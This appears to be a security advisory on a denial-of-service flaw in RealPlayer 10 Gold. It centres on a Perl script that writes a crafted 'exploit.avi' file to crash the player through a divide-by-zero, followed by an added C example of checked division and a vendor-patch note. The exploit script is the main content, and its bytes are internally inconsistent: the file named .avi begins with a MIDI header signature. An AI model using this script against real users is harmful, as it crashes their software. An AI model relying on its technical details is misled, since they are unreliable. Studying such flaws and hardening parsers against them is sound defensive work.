Release date:
Updated on:
Affected Systems:
Real Networks RealPlayer
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54220
RealPlayer is a tool used to listen to and watch real-time audio, video, and Flash on the Internet.
RealPlayer 10 Gold has a remote denial of service vulnerability when processing malformed .avi files, which can cause the affected application to crash.
<* Source: Dark-Puzzle
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Dark-Puzzle () provides the following test methods:
#------------------------------------------------------------------------#
##
# Usage: perl realplayer.pl #
##
#------------------------------------------------------------------------#
my $h = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff";
# [Disassembly]
# "\x0C\x20\x87\x74" PUSH EBX
# "\x0D\x20\x87\x74" MOV EAX, DWORD PTR SS:[EBP+8]
# "\x10\x20\x87\x74" MOV EBX, DWORD PTR SS:[EBP+C]
# "\x13\x20\x87\x74" MOV ECX, DWORD PTR SS:[EBP+10]
# "\x16\x20\x87\x74" MUL EBX
# "\x18\x20\x87\x74" MOV EBX, ECX
# "\x1A\x20\x87\x74" SHR EBX, 1
# "\x1C\x20\x87\x74" ADD EAX, EBX
# "\x1E\x20\x87\x74" ADC EDX, 0
# "\x21\x20\x87\x74" DIV ECX <---- As we see, we can't divide by zero. So an error occurs and the program crashes here.
# [Registers]
# EAX 00000000
# ECX 00000000
# EDX 00000000
# EBX 00000000
# Error: Integer Division by Zero ---> Exception handling vulnerability.
# This exception handling can lead to a DoS attack. However, the concept of using this vulnerability is to create an exception so the program crashes. And it's a local exploit.
# Write the malformed file to the current directory.
my $file = "exploit.avi";
open(my $File, ">", $file) or die "Cannot open $file: $!";
print $File $h;
close($File);
print "0 // Exploit By Dark-Puzzle!\n";
print "1 // Follow me: http://fb.me/dark.puzzle\n";
print "0 // avi file Created Enjoy!\n";
print "N.B: If the program says to locate the file just browse into its directory and select it, if not, Enjoy\n";
# End Of Exploit
#--------------------
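
The disassembly in the test method above computes (a * b + c/2) / c from three stack arguments and faults at DIV ECX when the divisor read from the file is zero. The following C code is an added example, not code from RealPlayer or from the original advisory; it shows that arithmetic without a check beside a checked form, and its function names and status codes are assumptions made for illustration. It goes one step beyond the page by also rejecting a quotient that does not fit in 32 bits, which makes the x86 DIV instruction raise the same divide error.

```c
#include <stdint.h>
#include <stdio.h>

/* Illustrative status codes (assumed names, not from any real API). */
enum { MD_OK = 0, MD_DIV_ZERO = -1, MD_OVERFLOW = -2 };

/* Mirrors the disassembled sequence: MUL, SHR, ADD/ADC, DIV.
 * No check on c: with c == 0, as in the register dump, the division traps.
 * (In C this is undefined behaviour; on x86 it raises the divide error.) */
uint32_t muldiv_unchecked(uint32_t a, uint32_t b, uint32_t c)
{
    uint64_t wide = (uint64_t)a * b + (c >> 1);
    return (uint32_t)(wide / c);
}

/* Hardened form: validate the file-supplied divisor and the quotient width
 * before dividing, and report failure instead of faulting. */
int muldiv_checked(uint32_t a, uint32_t b, uint32_t c, uint32_t *out)
{
    if (c == 0)
        return MD_DIV_ZERO;
    /* (2^32-1)^2 + (2^31-1) still fits in 64 bits, so this cannot wrap. */
    uint64_t wide = (uint64_t)a * b + (c >> 1);
    uint64_t q = wide / c;
    if (q > UINT32_MAX)
        return MD_OVERFLOW;
    *out = (uint32_t)q;
    return MD_OK;
}

int main(void)
{
    /* Constructed inputs: {a, b, c} as a parser might read them from a header. */
    uint32_t cases[][3] = { {10, 3, 4}, {0, 0, 0}, {0xFFFFFFFFu, 0xFFFFFFFFu, 1} };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        uint32_t r = 0;
        int st = muldiv_checked(cases[i][0], cases[i][1], cases[i][2], &r);
        printf("a=%u b=%u c=%u -> status=%d result=%u\n",
               (unsigned)cases[i][0], (unsigned)cases[i][1],
               (unsigned)cases[i][2], st, (unsigned)r);
    }
    return 0;
}
```

A parser that gets MD_DIV_ZERO or MD_OVERFLOW back should reject the file as malformed rather than continue with a default value.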
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Real Networks
-------------
Currently, the vendor has not provided a patch or upgrade. We recommend that users of the software follow the vendor's homepage to obtain the latest version:
http://service.real.com/realplayer/security/